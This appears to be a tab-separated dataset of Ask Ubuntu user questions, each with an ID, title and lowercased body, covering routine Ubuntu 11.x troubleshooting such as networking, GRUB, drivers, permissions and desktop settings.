83540	should i use jigit to save bandwidth when downloading daily cd images ?	i thought i 'd start having a look at 12.04 . since the image is going to change a lot in the near future , i thought it would be wise to use jigit . as i recall , it only downloads things that have changed since the last time ? i installed the package `` jigit '' . now what ? it does n't provide a jigit command .
83542	why does alt+left shift my virtual terminal left one ?	normally i use alt+left key combo to go back one click in firefox but recently i noticed it 's moving to vt6 instead . alt+right moves in the other direction among the vt screens . this is supposed to be disabled when x is running . where is this configured and how do i turn it off ? edit : i just tried out running a guest user session , and alt-left does n't do this in unity . so this is probably something to do with my specific user , or metacity .
83543	ubuntu linux updates do n't update to latest version , why ?	i 'm using ubuntu and any now and then new updates are offered for installation . however i 've noticed these updates do n't necessarily offer the latest update for any one package , but why ? for example , today , under ubuntu 11.04 i 'm beeing offered to update the linux kernel from version 2.6.38.12 to 2.6.38.13 , but on my secondary computer running xubuntu 11.10 the kernel version is already 3.0 ! ? other examples are the nautilus package which remains at version 2.32 in ubuntu 11.04 and which is already at version 3.2.1 on xubuntu 11.10 , or mono jit compiler sticking to 2.6.7 in 11.04 but already at 2.10.5 in 11.10 . so , does anyone has a clue as to why these updates are updating my system to old versions ?
83545	mac os x-like application launching for ubuntu/linux ?	once an application is first launched in os x from the dock , it stays open in the background , even after you close all open windows for that application . for example , if i open google chrome from the dock and start a session with 3 windows , then close all of those windows when finished with them , the chrome icon will retain the small dot under its dock icon signifying that it is still 'open in the background ' . this makes opening further windows for that application almost instant , rather than having to reload the application every time to create a new window . i am wondering if it is possible to implement this feature in a linux environment , as i have not found a way to do so . note that i am only talking about the application launching mechanism , i am aware of docky and other programs that simulate the os x dock , but i have not yet came across a way to make linux exhibit this preloading behaviour . thank you
83549	python script wo n't write data when ran from cron	when i run a python script in a terminal it runs as expected ; downloads file and saves it in the desired spot . sudo python script.py i 've added the python script to the root crontab , but then it runs as it is supposed to except it does not write the file . $ sudo crontab -l > * * * * * python /home/test/script.py > > /var/log/test.log 2 > & 1 below is a simplified script that still has the problem : # ! /usr/bin/python scheduleurl = 'http : //test.com/schedule.xml' schedule = '/var/test/schedule.xml' # download url and save as filename def wget ( url , filename ) : import urllib2 try : response = urllib2.urlopen ( url ) except exception : import traceback logging.exception ( 'generic exception : ' + traceback.format_exc ( ) ) else : print ( 'writing : '+filename+ ' ; ' ) output = open ( filename , 'wb ' ) output.write ( response.read ( ) ) output.close ( ) # download the schedule wget ( scheduleurl , schedule ) i do get the message `` writing : name of file ; '' inside the log , to which the cron entry outputs . but the actual file is nowhere to be found ... the dir /var/test is chmodded to 777 and using whatever user , i am allowed to add and change files as i please .
83550	how do i get my logitech c510 camera to work ?	i 'm new to ubuntu and am still learning ( recent windows convert ) . how do i get my logitech hd c510 to work with my ubuntu 11.10 ? thanks !
83552	how do i set the default sort order in open file dialog to `` name '' ?	somehow the default sort order in open dialogues has changed to be sorted by modified . it 's changed in all programs , not just a specific one . this forces me to reach for the mouse and click the name column every time i open a file ( maybe i 'm nitpicking but this gets annoying ... ) . how can i set the default sort order back to name ? nautilus sorts by name by default when i browse into folders .
83553	what is the difference between dependencies and pre-depends ?	can some one explain me what is meant by dependencies , pre-depends and the difference between those 2 type of package requirements when i am installing something in ubuntu ?
83554	how do i make a static ip with wlan0 ?	i am trying to set a static ip address for my server , but what ifconfig is returning is leaving me a little bit confused : if i run the command ifconfig i see that wlan0 is the only returned option that is sending and receiving packets besides the local loopback . this should be , as i am using a pci adapter in my desktop in order to access the internet wirelessly . ( i know this is not the most efficient way - learning purposes ) the problem is , i do not know how to configure /etc/network/interfaces with a wlan0 address ; no matter where i look on the internet , they all say to use eth0 , but i am not using ethernet . any help is greatly appreciated .
83557	did unity disable keyboard shortcuts changes ?	this is a new computer and a new install of 11.10 . i 've launched 'keyboard ' from dash and try to change a keystroke , but no cigar . nothing happens . this has happened ever since i installed 11.10 on my other computers as well ( but those computers were upgrades from 10.10 with custom keystrokes ) . is there another way to change keyboard shortcuts that i 'm not aware of ?
83566	application custom stock icons not working in ubuntu unity top panel menu ( aka appmenu ) ( `` menus have icons '' on )	i recently noticed that in ubuntu unity the top menu of my apps does not show the ( custom ) icons i added to the gtk stock , but only the basic gtk stock icons . this happens only since the top menu is displayed in the unity top panel ( appmenu ) and not in the application window . in place of the correct custom icons i see `` gtk-missing-image '' . on my apps toolbars and other menus those icons are displayed properly , the problem is only with the top menu . this happens either with pygtk2 ( e.g . http : //www.giuspen.com/cherrytree/ ) and gobject introspection ( e.g . http : //www.giuspen.com/nautilus-pyextensions/ ) . i use gtk ui manager after integrating the stock icons this way : factory = gtk.iconfactory ( ) pixbuf = gtk.gdk.pixbuf_new_from_file ( filepath ) iconset = gtk.iconset ( pixbuf ) factory.add ( stock_name , iconset ) factory.add_default ( ) if anybody solved this problem please help . cheers , giuseppe .
83568	why , when on kubuntu i lose internet connection , am i unable to reconnect ?	using kubuntu 11.10 . sony vaio computer . network controller : intel corporation wifi link 5100 . if i connect to a wireless network , and the signal drops , then i am unable to connect to any network without a reboot . i can assure that the issue has nothing to do with the computer going to sleep , as i have experienced the above while using my computer continuously . here is exactly what happens : connect to network ( at university , where the connection is not so great ) . the connection is broken there are three other possible networks available , but none of them can be connected to . i have tried off and on sometimes for hours . i am always able to reestablish a connection after a reboot . i can only think of two explanations . the first is that a temp file is corrupted when the internet connection is abruptly dropped . the second is that my computer actually corrupts something before the loss of internet connection , which causes the loss in signal , and inability to reconnect . however , i am not confident that my explanations are complete , nor do i have any idea how to test these things .
83569	does the concurrency=shell tweak work in 11.10 ?	i have a multi-core processor , so i just thought i 'd make use of this tweak . but before i do tweak it , i would like to know whether this tweak still works in 11.10 ?
83575	ubuntu 11.10 loads from live usb fine , but boots to black screen from harddrive . why ?	a few days ago i had a hard drive failure , which was running windows xp ( 32-bit ) just fine . the second hard drive in my computer held a few unimportant files , so i formatted it in the ubuntu setup and installed 11.10 without a hitch . i had been using it for about a week , but decided to install windows 7 ( 64-bit ) in order to utilize networking with my home server ( running windows server 2000 ) . my system is 64-bit based , and thus i had no problems installing other than a basic ram error that required me to remove my ram down to a single stick . i played with the settings in windows 7 for around an hour before i shut down . after reinstalling the ram , windows 7 would not boot . in this , i then assumed that something about my system was rejecting win7 and i reinstalled ubuntu . however , now ubuntu ( 11.10 ) boots into black screen , and i 've already attempted activating the grub menu with the shift key , and following steps listed here : https : //wiki.ubuntu.com/x/troubleshooting/blankscreen but nothing seems to work . i 've reinstalled twice now , with the same result each time . now , the very odd part about this whole scenario is that the usb i installed from has no problems booting as a live usb . this puzzles me greatly , because the hard drive boots straight to black screen and the live usb loads normally . at this point , my only theory is that the boot sector of the hard disk was somehow corrupted with win7 , and that ubuntu was unable to completely write through . i used darik 's boot n nuke to wipe the drive , but was met with an error , this also puzzles me because the hard disk has no promblems reading or writing . any suggestions/comments are appreciated . if you have a theory , i will be more than happy to oblige . additional information : intel core2 duo e6400 2.13ghz nvidia geforce 7-series ( 7900 gs ) 4 gb ddr2 333mhz ( 2x 2gb ) dell xps 410 bios revision 2.5.3
83578	how can i upgrade to 11.10 from the command line ?	i am trying to upgrade my 11.04 ubuntu operating system to 11.10 , as the current system is not the most recent . however , i can not use the gui to upgrade - as from past experience i have learned this - because my graphics hardware only works on 10.04 to 11.04 ( non-inclusive ) and from 11.10+ . so once i can get to 11.10 , i should be just fine . because of this , i need to find a way to upgrade the os from the command line . can this be done ? thanks for any and all help .
83580	ubuntu font family and mac os x confusing font name and font	i really like the ubuntu font family , and frequently use it in my documents . at school , i want to be able to use the font family so my documents that make at home using ubuntu show up correctly at school . however , we do not have permission to use font view ( which also allows you to install fonts ) , so i copied the .ttf files for the ubuntu font into the /home/library/fonts directory . the fonts now show up in the list of available fonts . however , when i click on ubuntu light , it uses the ubuntu font , and when i click on ubuntu , it uses the ubuntu light font . this is irritating because my documents that i make on my home computer show up in the opposite font at school , and documents i make at school show up in the opposite font at home . this is really irritating . my school uses mac osx 10.4 . any help would be greatly appreciated . edit : this happens with windows too , so it 's something wrong with the font that ubuntu put on the website .
83587	adobe flash player installation fails	i am using ubuntu 11.10 . the firefox error message says '' a plugin is needed to display this content : adobe flash player installer '' so i install it . then it says `` installed - restart firefox '' i restart firefox and the same error message appears . this problem does n't happen with windows 7 ( ie , chrome & firefox are fine ) or my previous version of ubuntu . problem occurs when i access callofroma.com
83590	how do i disable the touchpad using the upper left corner on an hp pavilion dv6 ?	to disable the touchpad on an hp pavilion dv6 , you double tap on an area in the upper left hand corner of the touchpad . then the blue indicator light around the border of the touchpad turns red , and the touchpad is disabled . double tapping on this area again turns the touchpad turns back on . i do a lot of typing , and frequently bump the touchpad , messing up my work and annoying me . so , i would like to enable the ability to disable the touchpad by double-tapping on the area in the upper left hand corner . unfortunately , there is no function key backup to disable the touchpad . this does not work in ubuntu . i can turn it off using touchpad-indicator , but the program must be manually started and you have to disable using the key combination . double-tapping the area is much easier . my computer is the hp pavilion dv6-6135dx . any help would be greatly appreciated .
83595	unable to do administrative tasks/install packages	i 've installed ubuntu 10.10 using wubi , but it does n't seem that i have proper priveleges or something to install software or do other administrative tasks . if anyone has any suggestions , tips , or tricks , they would be highly appreciated .
83597	how do i show date next to time in the panel with gnome-shell ?	i would like to show the date in the bar up the top there ( next to the time ) . i can not see any obvious way to enable this .
83599	creating a mail server on amazon ec2 ?	does anyone know the latest ami that has the preconfigured postfix mail server on it , for use with a `` micro '' instance of amazon ec2 ? i 'm having trouble searching for a ami instance using elasticfox . i ca n't find anything newer than like 2009 ...
83605	how do i export customized libreoffice config files ?	is this possible ? i want to make my own config file for my customizations that i can apply whenever i reinstall my system . for example , ubuntu 's default font color is just stupid . i want it to be black and not dark grey . and i want to turn on autosave every 3rd minute and backup files . is there a config file that i can change ? the .libreoffice/* folders and xml files does n't make sense , and they do n't seem to change when i change stuff in libreoffice . could someone please help me out with this ? thanks .
83609	scanner on brother 420cn does not appear in simple scan	my scanner does not show up in ubuntu 11.10 . it is a brother mfc 420cn usb printer . could someone please show me how to install the driver for this printer ? thanks .
83611	how to use android 2.1 phone as remote audio receiver ?	i have an unused htc hero android phone ( running android os 2.1 ) , i would like to connect it to audio amplifier and leave it connected for months , so i could use this android phone as remote pulseaudio server/receiver/etc . there is `` remote audio '' application available on android market , that can grab stream from /dev/dsp . /dev/dsp has been disabled by mistake/whatever reason in ubuntu 10.10 and even after i enabled it as per this thread - after following these instructions it did n't help , so when i click play/pause button on my android - nothing really happens and mpg123 song.mp3 still uses my laptop speakers . last | head even does n't show this new user logging in ( i suppose it should appear here ? ) searching by `` pulseaudio '' i found airbubble on android market , but it says `` does not work with raopx on macos x and the raop module for pulseaudio on linux . '' ( c ) so is there a way to use android phone as remote audio receiver , ideally not limited to playing mp3/music - but the sound sub-system in general ? surely i 'm not the only man who wishes to broadcast audio to the android phone via wi-fi to listen it on proper speakers ?
83617	can i build a ubuntu iso from a manifest ?	this answer talks about the iso manifests - an example is here.. is it possible to build an iso from a manifest file , or is the manifest file just dpkg -- get-selections put into a text file ? related , sorta : how do i make my own customized ubuntu version ? how to customize live ubuntu cd ?
83620	lost password after installing and configuring afs in the system	i just installed ubuntu 11.10 on my computer , my problem is that after i configure the afs client , i lost my admin password and root password . do have any idea to recover my password ?
83622	is there any alternative to the mac os x dashboard ?	as the title states , does anyone know of a dashboard alternative for ubuntu ? this is useful feature in mac os x , middle-clicking on the mouse brings up a customizable page where you can put anything from weather and stock reports to games . is there any equivilent for this in ubuntu ?
83628	unable to view existing data of my windows d partition which is now ubuntu host partition	i am new to linux environment.i 've installed dual boot ubuntu with windows directly downloading from the internet . now i am able to see my windows c partition but unable to view the existing data of my windows d partition which is actually now ubuntu host partition i 've checked it by download gparted partition editor .
83629	where can i find the latest paper cuts	i remember seeing in launchpad and the ubuntu wiki a page where i could see the 100 paper cuts that were worked on for the latest ubuntu ( i think it was 9.10 or 10.04 in that time ) . do the 100 paper cuts still exist and if so are they available to see for ubuntu 11.10 ( to see which paper cuts were solved ) and 12.04 ( to see which paper cuts will be worked on ) .
83633	how do i install postgres graphical installer ?	i am a newbie in using ubuntu ( more precisely never used linux except the production deployment ) . now i choose to hold a grip on the system and intalled a latest 11.10 ubuntu in my 32 bit intel** desktop . in this machine **i have a 'administrator ' user 'tusar ' . i want to install the postgresql graphical version so downloaded this file postgresql-8.4.9-1-linux.bin from here now if run the file with ./filename command ( refuses if i am not root ) , it opens up the graphical interface and completes the installation ( creates user postgres and ask for password , wont complete if i dont give valid password ) . i checked with /etc/inint.d/postgresql-8.4 status , that postgres is running . but the problem is i am unable to open the gui ( i installed it in /opt/postgresql ) , its telling permission denied even if i am logged in as 'tusar ' . then i tried using the su postgres command and it directly changed the user without password . now if i run the psql , createdb , its prompting me to install the postgres-client-package but this utilies are already installed and i can view them in my /opt/postgresql/8.4/bin folder . i can run query through my jdbc utility programs but unable to use neither terminal nor the graphical interface ( although i can see pgadmin3 is there ) . urgent help needed . i have used this guide for the installation .
83636	installing 64bit ubuntu on intel ( r ) core ( tm ) 2 duo cpu t5870 , possible ?	i 'm thinking if it 's possible to use a 64bit ubuntu on a dual cpu architecture ? how can i tell from /proc/cpuinfo ? processor : 0 vendor_id : genuineintel cpu family : 6 model : 15 model name : intel ( r ) core ( tm ) 2 duo cpu t5870 @ 2.00ghz stepping : 13 cpu mhz : 800.000 cache size : 2048 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm lahf_lm ida dts bogomips : 3991.23 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : processor : 1 vendor_id : genuineintel cpu family : 6 model : 15 model name : intel ( r ) core ( tm ) 2 duo cpu t5870 @ 2.00ghz stepping : 13 cpu mhz : 800.000 cache size : 2048 kb physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm lahf_lm ida dts bogomips : 3991.25 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management :
83637	ubuntu 11.04 live cd only shows the recovery partition	i want to be able to dual boot windows 7 and ubuntu together but , can not do it without knowing that ubuntu is going to install onto the main section of the disk . the hdd is 750gb while the recovery partition is only 30gb .
83641	libre office impress opens in 11.10 , but not in the launcher	i double click my presentation to open it w/impress and it opens , but there is no icon in the launcher ( or alt-tab switcher ) to indicate that its open . i tried keeping the impress icon in the launcher , then opening my presentation , but the same thing happened . then i tried opening impress from the launcher and opening my file from inside impress ... no luck either . what 's up with that ? btw , im using 11.10 and the file was made with office 2010 and saved as a .ppt if that has anything to do with it . any help is appreciated
83642	nomodeset installation	i were following the address from coldfish on how to set nomodeset , but i do n't know how to `` save '' the changes made to the line grub_cmdline_linux_default= '' quiet splash nomodeset '' i hit ctrl+o to save and get file name to write : /etc/default/grub and typed sudo update-grub and hit enter . after that , i open another terminal an type : sudo update-grub ( ask me for password ) and them i got this : joseluis @ ubuntu : ~ $ sudo update-grub [ sudo ] password for joseluis : generating grub.cfg ... cat : /boot/grub/video.lst : no such file or directory found linux image : /boot/vmlinuz-2.6.38-12-generic found initrd image : /boot/initrd.img-2.6.38-12-generic found linux image : /boot/vmlinuz-2.6.38-8-generic found initrd image : /boot/initrd.img-2.6.38-8-generic found windows 7 ( loader ) on /dev/sda1 found ubuntu 10.04 lts ( 10.04 ) on /dev/sda6 done joseluis @ ubuntu : ~ $ so : were i 'm ? were is my direction now ? thanks for the help .
83651	how to make workspace switcher work properly ?	i am using ubuntu 11.10 and the workspace switcher button in the launcher has stopped working . not sure how or when this happened , or what i might have done to cause this problem . but when i click it , it does nothing and i can not remove or move it either . all the other buttons in the launcher seem to work correctly and i can move them around freely . i can still use the keyboard shortcut keys to switch from one workspace to another . so , it is not that i only have one workspace . so , how to make the workspace switcher work ?
83653	universal alt-tab	frequently , i am playing a game and someone i would like to chat with comes online but i am unable to switch to the chat winndows because the game is grabbing my mouse . in windows , i can just alt-tab out of anything and then proceed to do something else . i am currently running xubuntu 11.10 . how can i make alt-tab switch me from any application , no matter what ?
83656	is there a free anonymous proxy app ?	is there any app like the this for ubuntu ? i basically wan na check a websites indian version so i can see the indian price and not in dollars us price i 'm currently in usa .
83657	what is rf-kill ?	what is rf kill & how do i fix it
83658	how to install apple safari without using wine ?	being a web developer i would like to install apple safari to check the proper working of my code . but i 'm not getting how to install the apple safari on ubuntu 10.10 ? ( without wine )
83659	can i select files using checkboxes ?	i 'm tired of pressing and holding control key in ubuntu 11.10 when selecting multiple items , is there any way to get checkboxes to my documents and directories as in versions of windows ?
83667	while installing ubuntu , it asked me to allocate something called swap space , what exactly is it ?	while installing ubuntu , it asked me to allocate something called swap space , what exactly is it ? what would happen if i dont allocate it ? / what is the use if i did allocate ?
83672	why are some applications so hard to find in the ubuntu software centre ?	some applications do n't pop up in the search even when you type in their name . take for instance sushi . when you type in `` sushi '' into the search box , it fails to throw up the application . only when you type in `` gnome-sushi '' does it appear . this is despite the fact that the application has `` sushi '' by itself in the application description . there are other applications which do n't spring to mind right now , but i 've discovered before .
83678	ca n't use laptop display ?	i 've just installed ubuntu 11.10 with a livecd . during the installation , nothing was shown on screen unless i plugged in an external monitor . same thing happens within ubuntu . i have an emachines e525 . could this just be a backlight issue or something ? it works fine on windows though . if anyone could help , that 'd be great . please explain everything throughly if you can though , i 'm new to all of this .
83685	scheduling startup and shutdown	i use torrents often , so i need to know how to make my computer start up and shut down automatically , wi-fi is switched on at six in the morning in my hotel and switched off at two am . ( i am able to schedule torrents , that 's not a problem ) , i do n't want my computer always plugged in to a power supply .
83686	how to use unity 's global menu in gnome shell , if possible ?	i was woundering is the is a way/possibility to use unity 's global menu with gnome shell on ubuntu 11.10 ? it would be really nice to have it . does anyone have an idea on how to make this real ?
83690	mounting wubi part from another linux installation	hope someone can help . i need to access 11.04 ubuntu files residing on a second hard drive ( dual boot xp/ubuntu ) from a 10.04 hard drive installation . the 11.04 system co-exists with xp on the second drive . this drive is hpfs/ntfs . my 10.04 installation mounts and displays the contents of the xp installation and all files but the 11.04 system is nowhere to be seen . how can i see and access the ubuntu partition , please ?
83693	how to switch between applications in current workspace only in gnome-shell ?	in unity , i used to configure in ccsm . how do i do it in gnome-shell ?
83694	error while upgrading	when i have select to install updates from the update manager it says : failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-3.0.0-13-generic_3.0.0-13.22_i386.deb size mismatch i have tried several times and through terminal too but the size mismatch repeats itself there too . what is this size mismatch error ? please help ? i also tried sudo apt-get update and sudo apt-get upgrade , but the error comes again . failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-intel/xserver-xorg-video-intel_2.15.901-1ubuntu2.1_i386.deb size mismatch e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
83696	how to filter content in the currently opened folder ?	there is one thing i 'm missing since i 've been forced to move from osx to ubuntu . for osx there is a wonderful file browser named path finder which has very handy filter function built-in . the search field in the path finders upper right corner is n't searching your whole hd , it 's not searching in all the sub folders of a given directory ( like in nautilus ) . it 's just filtering the content of the folder you have currently opened without looking in to the subfolders . is there something similar ( plugin , extension , etc . ) available for nautilus ? two users have already asked the same question , but the answers obviously missed the point .
83699	how do i make the top panel transparent in unity ?	i 'm using a fresh install of ubuntu 11.10 using unity . i 'm a newbie to ubuntu and whilst researching various how-to 's , i have seen screenshots where ubuntu has the bar at the top of the screen shown transparent . i really like this , but i ca n't get it to do it on my box . i have tried ccsm ( 2 different methods ) , ambience theme editing ( a copy ) but it always shows as black . i log out after each change and then log back in . should i be restarting ? i 'm running : asus p5q pro intel core 2 quad q6600 @ 2.40ghz x4 geforce 9600gt 32-bit os 4x 1gb ddr2 ram modules ( although bios only shows i 'm using ~3gb )
83705	ubuntu loads unity 2d rather than unity 3d	at the login screen of my ubuntu box , i select ubuntu under the cog menu , but it loads the 2d version instead of the 3d version . i 'm running : asus p5q pro intel core 2 quad q6600 @ 2.40ghz x4 geforce 9600gt ( 1024mb ) 32-bit os 4x 1gb ddr2 ram modules ( although bios only shows i 'm using ~3gb ) is this setup not capable of running unity 3d ? i understand that it wo n't install it if it 's not supported ! unity_support_test output : pengl vendor string : nvidia corporation opengl renderer string : geforce 9600 gt/pci/sse2 opengl version string : 3.3.0 nvidia 290.10 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes glxinfo output after driver reinstall : direct rendering : yes gl_nv_path_rendering , gl_nv_pixel_data_range , gl_nv_point_sprite , direct rendering : yes gl_nv_path_rendering , gl_nv_pixel_data_range , gl_nv_point_sprite ,
83707	how do i change my desktop environment to lxde ?	i 'm running ubuntu 11.10 unity my battery does n't last more than 2 hours so i want to change from unity to lxde is it possible to install directly without formatting again ? if so can you give me instructions please
83708	recommendation for xmlspy foss alternative	i have already searched a little bit aroung google , and have n't found a suitable foss alternative for xml editors . i would need some of the nice features xmlspy has , like graphically analyse a xsd file . it would be nice if it were a cross platform tool .
83711	how can i rotate a video ?	is there a way to change the rotation angle of a video file ? i have a couple of videos in the wrong direction so all i wanted is to correct it .
83718	speakers / headphones always play simultaneously on an asus k50ab	there is a major problem that i 've been having with ubuntu . i can not play sound only on the speakers or only on the headphones . they always play simultaneously . i can not control the volume for them independently . i 've tried many solutions found on the web including adding an 'options ... ' line in some file ( that seems to work only on intel chipsets ) . i 've tried updating the driver but the repository is not found and so on ... could you please tell me if there is any specific solution related to my existing hardware ?
83729	how to repair an external hard-drive ?	i 've been using my external usb ( iomegea 250gb ) hard drive with standard configuration ( 1 fat 32 partition ) for a while . now it started inventing new corrupted / losing existing files . what should i do ? try to repair it ? how ? back up data and then try to format it ? format in fat32 again / in ntfs ( i need exchange with win computers ) ? with which options to make sure everything gets fixed ? so far i 've gotten with ubuntu : mount ... /dev/sdb1 on /media/ibackup type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) and sudo dosfsck -r -v /dev/sdb1 ... currently , only 1 or 2 fats are supported , not 0 . so far i 've gotten after reboot with win xp : chkdsk /f f : ... and evereything works fine . is there a linux way , though ?
83731	where are shell/terminal settings stored ?	i updated my ubuntu but it crashed during installation and i was not able to recover it ( my hard drive crashed ) . i changed my hard drive and re-install ubuntu i saved all my important docs ( bookmark , documents etc ... ) 1 thing i was unable to recover is the profile from my shell ( i changed the color scheme , title , number of lines scrollback etc ... ) where can i save this so next time something happen i wo n't have to set all over again my terminal settings ?
83734	update-manager not starting automatically	on my 11.10 installation , which i installed fresh on a new computer about a month ago , update-manager is not popping up automatically when new upgrades are available . i have set the options in `` software sources '' to check daily for updates , and to `` display immediately '' when new security or regular updates are available . i checked the answer from how can i get update manager to check & notify for daily updates , but this did n't solve the problem for me . update-notifier is installed on my system , but does not run . do i have to put that myself into the startup applications ?
83737	graphical features are quite slow on an hd radeon 3200	i just got new laptop and it had windows 7 -preinstalled . laptop was quite fast with windows 7 . anyway , i basically only watch videos , irc and code php with this laptop , so i thought that ubuntu would be better choice for me , so i installed it . computer is running tasks quite fast , but graphical features just are too slow to be true . for example , when i move window to another place , i do n't see any transition , only the start place and then it jumps to the place i dragged it . some info about the computer : packard bell easynote tj61 , 4gb ddr2 ram , amd athlon 64 x2 ql-64 ~ $ fglrxinfo* display : :0.0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 3200 graphics opengl version string : 3.3.11161 compatibility profile context i tried this and it sped up a bit : 3d compiz effects choppy and slow . how to fix ?
83741	how can i use ncmpcpp ?	i was wondering how to use this software.its called ncmpcpp.can anyone tell me how to use this software.i can use mocp & cmus both , but i ca n't figured out how to use this.if someone can upload a video tutorial it will be greatly appreciated . ncmpcpp web site
83742	does all hardware of a thinkpad edge e525 work	i would like to buy a new computer in the next days . the thinkpad edge e525 ( amd a6-3400m with amd radeon hd 6520g , product number 12002jg ) is in the pole position , but i did not find a review how the hardware works with ubuntu : ubuntu certification for lenovo i would be grateful for any speedy answer whether all hardware of the e525 works with ubuntu ( especially 11.10 ) . and if not , what are the issues and have you find a solution . thanks !
83743	can rhythmbox scrobble tracks from an internet radio stream ?	i 'm mainly using rhythmbox for listening to music , this includes radio streams . however i noticed that the radio tracks are not scrobbled to last.fm . is there any way around this ? i want my radio stations scrobbled as well , because i listen to them mostly .
83744	ca n't start ubuntuone-installer	hi all i 'm running kubuntu 11.10 and i 'm trying to run ubuntu one , but i get this error . what am i doing wrong ? maurizio @ maurizio-desktop : ~ $ ubuntuone-installer traceback ( most recent call last ) : file `` /usr/bin/ubuntuone-installer '' , line 39 , in < module > dialog = window ( ) file `` /usr/lib/python2.7/dist-packages/ubuntuone-installer/ubuntuone/installer/gui.py '' , line 105 , in __init__ _ ( u'discover the freedom of your personal cloud ' ) ) ) unicodedecodeerror : 'ascii ' codec ca n't decode byte 0xc3 in position 16 : ordinal not in range ( 128 ) thanks
83748	file transfers by usb stalling and failing	i connect to my samsung galaxy s2 by usb from my ubuntu 11.10 computer . it was working fine up until a few days ago . now , for reasons i ca n't determine , whenever i try to copy any files using the file manager ( nautilus ) , the transfer always stops at around 10 to 15 % done , and then it hangs . the only way to kill the process is to disconnect the usb physically . i thought maybe this was a problem with the sd card having an error , so i reformatted it , but that has n't helped . also , the same thing happens with the galaxy 's internal usb storage as well . this seems to be an ubuntu problem , as i tested transferring files on a windows computer and it went through without any issues .
83761	how do i move window to specific workplace via keyboard ?	in 11.11 keyboard settings there are move window to workspace n options ( n is the workspace number ) . but they do not work . is there a way to bind key for moving window to a specific workspace/viewport ?
83762	looking for a linux equivalent to trans lucy	trans lucy for the mac , allows you to watch video in a semi transparent window , superimposed on top of your other windows . you can continue to work , as all clicks on the area covered by trans lucy pass directly to the window below - as if the window was n't there . does anyone know of an equivalent for linux ?
83763	white screen on one monitor after logon ... how to fix ?	today i have been having major issues ... . i was running unity2d even though i was choosing ubuntu in the cog menu ( was trying to get transparent panels ) . this seemed to be caused by my graphics drivers . after reinstalling my nvida proprietary drivers , i now have unity3d , but one of my screens shows up as white . the screen is totally blank ( white ) and when moving the mouse into it shows a black x icon instead of the usual mouse pointer . running the script from this blog make the wallpaper show up , but i still can not use the desktop on that screen . i ca n't drag windows there but can move mouse onto it . i 'm not sure where to run the scripts so i just run them from a terminal window ... maybe they need running sooner ... . my hardware : asus p5q pro intel core 2 quad q6600 @ 2.40ghz x4 geforce 9600gt 32-bit os - ubuntu 11.10 4x 1gb ddr2 ram modules latest nvidia drivers from their website
83764	why is sound changed muted on 11.10 startup ?	sound is always muted at startup that is after the login . i have to unmute it every time . how can i fix this sound mute problem which occurs at the startup ? btw , i am using hp mini .
83771	recovering grub after installing windows 7 ?	i installed windows 7 after it crashed , and now i am unable to boot ubuntu . ubuntu partitions are still there . i tried using boot-repair , but it did n't work !
83775	check connection and reconnect wifi	i 'm building a wireless photoframe . the one thing i have n't been able to figure out is how to get my wifi connection back up using a recommended method . right now i edited /etc/network/interfaces so wlan0 is started at boot : auto wlan0 iface wlan0 inet dhcp wireless-essid ourssid this method works fine for booting . but i found that if i do not check the connection for a long time ( could be a week ) it might be down . so i should reconnect . what i do now to verify the connection is working is downloading a file from the server that ca n't be cached ( http : //server.ext/ping.php ? randomize=123456 ) if i fail to retrieve the file i assume that the connection is no longer working and i run a shell script like # ! /bin/bash ifconfig wlan0 up iwconfig wlan0 essid `` ourssid '' dhclient wlan0 and the connection comes back . but i ca n't find anything if this is in any way a good method . can this be improved upon , or is this already right ?
83777	nvidia card not recognized	i have a lenovo t420 with the on board intel graphics card and the nvidia 4300m but ubuntu only sees the on board card . any idea how to get it to see the nvidia card ? thanks
83788	accessing files in a directory without x-permission ?	i am having a bit of trouble understanding what the execute permission means for directories . do i understand it correctly that anything in a directory for which a user does not have x-rights is inaccessible even if the things inside the directory gives specific rights to the user ? or will the user still have direct access to the things in the directory , but simply can not list what is in the directory ? ( what i am really trying to understand is how safe a directory is from access from other users if they do not have x-permission for it . )
83789	apple aluminum keyboard via bluetooth - fn key problem	i 'm connecting an apple bluetooth aluminum keyboard ( this one ) to my lubuntu setup using the blueman applet . the keyboard types fine , but i would like to use its fn key to change screen brightness changing , page-up ( fn+ctrl+down ) , page-down ( fn+ctrl+up ) , et cetera . right now the fn key does n't seem to work . when i use xev , i do n't see anything happen when i press fn . does the keyboard not send this to the computer at all ? do i need to configure blueman 's `` input service '' setting to make this an apple ( rather than a generic ) keyboard ? ( it 's not obvious how to do this . ) is xev just not showing the fn key ? where in this stack of software do i need to make a change to achieve the desired behaviour ? thanks !
83792	video recorder tool ( screencast ) that is up to date	i was looking at this post how to create a screencast ? which mentions some of the video recorders ( screencast ) that i was looking for but some of them are more than 8 months old with not one single update made to them . am looking for a screencast that is at least update recently and that i know that if i keep using it i could count on it being updated . the most important part is video recording but sound is good too . maybe a windows area , mouse tracking , etc.. but it needs to be up to date and not abandoned or very old . and of course that works in 11.10 and has in mind to work in 12.04 .
